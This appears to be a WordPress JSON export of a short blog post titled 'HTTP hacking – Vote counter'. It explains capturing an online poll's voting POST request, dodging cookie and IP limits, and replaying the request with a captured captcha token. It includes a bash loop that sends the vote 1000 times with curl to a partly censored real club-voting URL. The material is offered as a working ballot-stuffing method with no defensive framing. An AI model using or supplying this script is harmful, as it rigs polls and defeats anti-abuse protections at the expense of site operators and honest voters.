{"id":714,"date":"2017-08-09T15:29:06","date_gmt":"2017-08-09T15:29:06","guid":{"rendered":"http:\/\/www.max-sperling.bplaced.net\/?p=714"},"modified":"2024-02-16T10:49:32","modified_gmt":"2024-02-16T10:49:32","slug":"http-hacking-vote-counter-example-1","status":"publish","type":"post","link":"http:\/\/www.max-sperling.bplaced.net\/?p=714","title":{"rendered":"HTTP hacking – Vote counter (Example 1)"},"content":{"rendered":"

1. Scan the traffic<\/strong><\/p>\n

Just capture the network traffic while simulate one sequence of voting. Possible tools you can use are Wireshark, Fiddler or Postman (used here). Normally the website will give you a cookie and\/or save your IP to forbid another vote. If something went wrong with the sniffing just delete the cookie and\/or change your IP. The important POST is happening after you pressed the submit button.<\/p>\n

<\/a><\/p>\n

\n

2. Write a script<\/strong><\/p>\n

After you have found the POST of interest you can write a script which sends this POST to the server over and over again. \ud83d\ude42 You don’t need to send all the parameter as seen in the capture, just skip the unnecessary ones.<\/p>\n

\r\nURL=https:\/\/clubs.star.de\/<censored>;\r\n\r\nPAR1="form_id=project_voting_form";\r\nPAR2="form_build_id=";\r\nPAR3="captcha_sid=1135309";\r\nPAR4="captcha_token=3502f03e7930342a9ecc5f21e73692c1";\r\nPAR5="captcha_response=";\r\nPAR="${PAR1}&${PAR2}&${PAR3}&${PAR4}&${PAR5}";\r\n\r\nfor ((i=1; i<=1000; i++));\r\ndo\r\n    curl --data $PAR $URL;        \r\ndone\r\n<\/pre>\n
\n
3. Execute the script<\/strong><\/p>\n
<\/p>\n
Before the Script<\/p>\n
<\/p>\n
After the Script<\/p>\n","protected":false},"excerpt":{"rendered":"
1. Scan the traffic Just capture the network traffic while simulate one sequence of voting. Possible tools you can use<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false},"categories":[26,55],"tags":[],"_links":{"self":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/714"}],"collection":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=714"}],"version-history":[{"count":1,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/714\/revisions"}],"predecessor-version":[{"id":16843,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/714\/revisions\/16843"}],"wp:attachment":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=714"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}